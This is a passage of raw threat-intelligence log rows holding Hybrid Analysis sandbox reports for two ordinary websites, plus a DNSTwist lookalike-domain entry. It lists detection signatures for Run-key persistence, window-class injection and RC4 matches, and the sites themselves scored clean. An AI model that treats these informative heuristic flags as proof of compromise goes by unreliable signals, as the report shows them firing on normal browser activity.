"Local\\SM0:4176:120:WilError_01"\n "SM0:4176:120:WilError_01"\n "SM0:4176:304:WilStaging_02"\n "Local\\SM0:4664:120:WilError_01"\n "Local\\SM0:4664:304:WilStaging_02"\n "SM0:4664:120:WilError_01"\n "SM0:4664:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4664:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4664:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4664:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "216.239.36.178:443"\n "142.251.2.155:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-161', u'name': u'Contains ability to modify processes thread functionality (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"OpenThread" [Source: 00000000-00004176.00000000.77481.4EB6F000.00000002.mdmp]'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00004176"\n YARA signature for RC4 encryption matched on file "Ruleset Data"\n YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00004664]\n "ef14caa0-45b8-4340-8ce8-25763dac1526.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ef14caa0-45b8-4340-8ce8-25763dac1526.tmp]- [targetUID: 00000000-00004664]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\hyphen-data\\101.0.4906.0\\manifest.json]- [targetUID: 00000000-00004664]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004664]\n "f_00023e" has type "Web Open Font Format (Version 2) TrueType length 44300 version 1.720"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00004664]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\4664_24740021\\deny_domains.list]- [targetUID: 00000000-00004664]\n "6714d6eb-a6fb-4baa-978b-770bb059a14a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6714d6eb-a6fb-4baa-978b-770bb059a14a.tmp]- [targetUID: 00000000-00004664]\n "f_00023d" has type "gzip compressed data from Unix original size modulo 2^32 4279879"- [targetUID: N/A]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\4664_220317772\\Filtering Rules-AA]- [targetUID: 00000000-00004664]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\hyphen-data\\101.0.4906.0\\manifest.fingerprint]- [targetUID: 00000000-00004664]\n "4b9e49a8-043a-44fa-8115-86fd2dca8e57.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4b9e49a8-043a-44fa-8115-86fd2dca8e57.tmp]- [targetUID: 00000000-00004664]\n "Session_13322605195158610" has type "data"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00001268]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4664_770442581\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004664]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00004664]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00004664]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\Trust Protection Lists\\Mu\\LICENSE]- [targetUID: 00000000-00004664]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00004664]\n "a940d667-2ab1-4f32-83c5-cd719578504a.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-4', u'name': u'Found a string that may be used as part of an injection method', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1055/011', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1055.011', u'relevance': 4, u'threat_level': 0, u'type': 2, u'description': u'"Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-184', u'name': u'Found registry location strings which can modifies auto-execute functionality', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1547/001', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-270', u'attck_id': u'T1547.001', u'relevance': 5, u'threat_level': 0, u'type': 2, u'description': u'Observed string:"software\\microsoft\\windows\\currentversion\\run" [Source: 00000000-00004176.00000000.77481.4EB6F000.00000002.mdmp]\n Observed string:"software\\microsoft\\windows\\currentversion\\runonce" [Source: 00000000-00004176.00000000.77481.4EB6F000.00000002.mdmp]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-143', u'name': u'Contains ability to retreive system language (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1614/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1614.001', u'relevance': 1, u'threat | 185.199.110.153 |
| 2023-05-12 02:57:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF182.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2108"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_83c_IE_EarlyTabStart_0x280_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_83c_ConnHashTable<2108>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_83c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_83c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2108"\n "IsoScope_83c_ConnHashTable<2108>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_83c_IESQMMUTEX_0_519"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "J04ZLJNG.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J04ZLJNG.txt]- [targetUID: 00000000-00002108]\n Dropped file: "SM32LH0E.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SM32LH0E.txt]- [targetUID: 00000000-00002108]\n Dropped file: "QA9U9LE5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QA9U9LE5.txt]- [targetUID: 00000000-00003816]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "CabF181.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002108]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003816]\n "RecoveryStore._45126F33-4631-11ED-9DDA-080027F73AF2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "2D02C83649E3FA2E79606E9C14752B3F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\2D02C83649E3FA2E79606E9C14752B3F]- [targetUID: 00000000-00003816]\n "J04ZLJNG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J04ZLJNG.txt]- [targetUID: 00000000-00002108]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002108]\n "~DFA8CA6D99ACF67640.TMP" has type "data"- Location: [%TEMP%\\~DFA8CA6D99ACF67640.TMP]- [targetUID: 00000000-00002108]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003816]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003816]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002108]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002108]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/"\n Pattern match: "https://www.moneygeek.com"\n Pattern match: "www.moneygeek.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /insurance/health/best-cheap-health-insurance-texas/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.moneygeek.com\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/89 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'6340254340d16e0a2d1801df', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'35.229.48.116'], u'sha256': u'3915ff7b4886499db28474c559936c4f13989a8c13d55ca8942d98b74060b5bf', u'sha512': u'ba6b1d0c54260ad883d3a8f976592dfaebbbae2be1a6a847c63838eacbc4d35c133e0ffead79115d306f43850ad6025f535973fd2d6cb6dc07c902b1db39db31', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/', u'submission_id': u'634d90f65d75c6515c6735fa', u'created_at': u'2022-10-17T17:29:26+00:00', u'filename': None}, {u'url': u'https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/', u'submission_id': u'6345893916c2ca0c6f6ab2fc', u'created_at': u'2022-10-11T15:18:17+00:00', u'filename': None}, {u'url': u'https://www.moneygeek.com/insurance/health/best-cheap-health-insurance-texas/', u'submission_id': u'6340254340d16e0a2d1801e0', u'created_at': u'2022-10-07T13:10:27+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-07T13:10:28+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, | 35.229.48.116 |
| 2023-05-12 02:58:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://sofrescousa.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.227.38.65:443"\n "162.159.134.68:443"\n "142.251.215.234:443"\n "142.250.217.106:443"\n "142.251.33.72:443"\n "104.18.11.207:443"\n "157.240.19.26:443"\n "134.122.45.153:443"\n "162.159.130.71:443"\n "172.67.143.128:443"\n "142.251.33.99:443"\n "142.250.217.110:443"\n "108.177.98.154:443"\n "172.217.14.194:443"\n "142.251.215.226:443"\n "23.227.38.33:443"\n "104.17.202.53:443"\n "52.84.52.94:443"\n "104.18.40.169:443"\n "104.21.73.210:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"aly.jst.ai"\n "app.sealsubscriptions.com"\n "cdn.jst.ai"\n "cdn.shopify.com"\n "cloud.goldendev.win"\n "forms.soundestlink.com"\n "maxcdn.bootstrapcdn.com"\n "monorail-edge.shopifysvc.com"\n "my.jst.ai"\n "omnisnippet1.com"\n "scripttags.jst.ai"\n "shop.app"\n "sofrescousa.com"\n "widgets.automizely.com"\n "www.goldendev.win"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3EB2.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_330_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_330_IESQMMUTEX_0_519"\n "IsoScope_330_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_330_ConnHashTable<816>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_330_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_816"\n "IsoScope_330_IE_EarlyTabStart_0x960_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_330_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_330_IESQMMUTEX_0_331"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "265V7D09.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\265V7D09.txt]- [targetUID: 00000000-00003688]\n Dropped file: "FPRCNTTM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FPRCNTTM.txt]- [targetUID: 00000000-00003688]\n Dropped file: "5LPDV3VI.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5LPDV3VI.txt]- [targetUID: 00000000-00003688]\n Dropped file: "CZY0F9ZV.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CZY0F9ZV.txt]- [targetUID: 00000000-00003688]\n Dropped file: "W1QY00XB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W1QY00XB.txt]- [targetUID: 00000000-00003688]\n Dropped file: "ZT5CWOJ1.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZT5CWOJ1.txt]- [targetUID: 00000000-00003688]\n Dropped file: "RI0YAIE5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RI0YAIE5.txt]- [targetUID: 00000000-00003688]\n Dropped file: "S400158B.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S400158B.txt]- [targetUID: 00000000-00003688]\n Dropped file: "T3A6HIO0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T3A6HIO0.txt]- [targetUID: 00000000-00003688]\n Dropped file: "Q5Y294TZ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Q5Y294TZ.txt]- [targetUID: 00000000-00003688]\n Dropped file: "H37KS5W3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H37KS5W3.txt]- [targetUID: 00000000-00003688]\n Dropped file: "Y17VN9WN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y17VN9WN.txt]- [targetUID: 00000000-00003688]\n Dropped file: "G21EGNE3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G21EGNE3.txt]- [targetUID: 00000000-00003688]\n Dropped file: "1E3MRT27.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1E3MRT27.txt]- [targetUID: 00000000-00003688]\n Dropped file: "HX819AAK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HX819AAK.txt]- [targetUID: 00000000-00003688]\n Dropped file: "L8VVD2ON.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L8VVD2ON.txt]- [targetUID: 00000000-00003688]\n Dropped file: "LXRS9H1E.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LXRS9H1E.txt]- [targetUID: 00000000-00003688]\n Dropped file: "2O9VPV20.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2O9VPV20.txt]- [targetUID: 00000000-00003688]\n Dropped file: "PH9TMVHE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PH9TMVHE.txt]- [targetUID: 00000000-00003688]\n Dropped file: "Y30HZTHE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y30HZTHE.txt]- [targetUID: 00000000-00003688]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab3EB1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "dwn_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlref_httpssofrescousa.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "265V7D09.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\265V7D09.txt]- [targetUID: 00000000-00003688]\n "jquery.currencies.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "FPRCNTTM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FPRCNTTM.txt]- [targetUID: 00000000-00003688]\n "5LPDV3VI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5LPDV3VI.txt]- [targetUID: 00000000-00003688]\n "CZY0F9ZV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CZY0F9ZV.txt]- [targetUID: 00000000-00003688]\n "launcher_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "W1QY00XB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W1QY00XB.txt]- [targetUID: 00000000-00003688]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003688]\n "fbevents_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ZT5CWOJ1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZT5CWOJ1.txt]- [targetUID: 00000000-00003688]\n "mwgt_4.1_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RI0YAIE5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RI0YAIE5.txt]- [targetUID: 00000000-00003688]\n "load_feature-ab38017af3cf759db0af0bbd1e75229f6a189f5bf1f2db42169630998b969021_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "S400158B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S400158B.txt]- [targetUID: 00000000-00003688]\n "loader_1_.js" has type "ASCII text"- [targetUID: N/A]\n "nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKeiunDXbtU_1_.woff" has type "Web Open Font Format TrueType length 25168 version 1.1"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://sofrescousa.com/"\n Pattern match: "https://sofrescousa.com"\n Heuristic match: "aly.jst.ai"\n Heuristic match: "app.sealsubscriptions.com"\n Heuristic match: "cdn.jst.ai"\n Heuristic match: "cdn.shopify.com"\n Heuristic match: "forms.soundestlink.com"\n Heuristic match: "maxcdn.bootstrapcdn.com"\n Heuristic match: "monorail-edge.shopifysvc.com"\n Heuristic match: "my.jst.ai"\n Heuristic match: "omnisnippet1.com"\n Heuristic match | 34.74.170.74 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | aahu.xyz | ayhu.xyz |
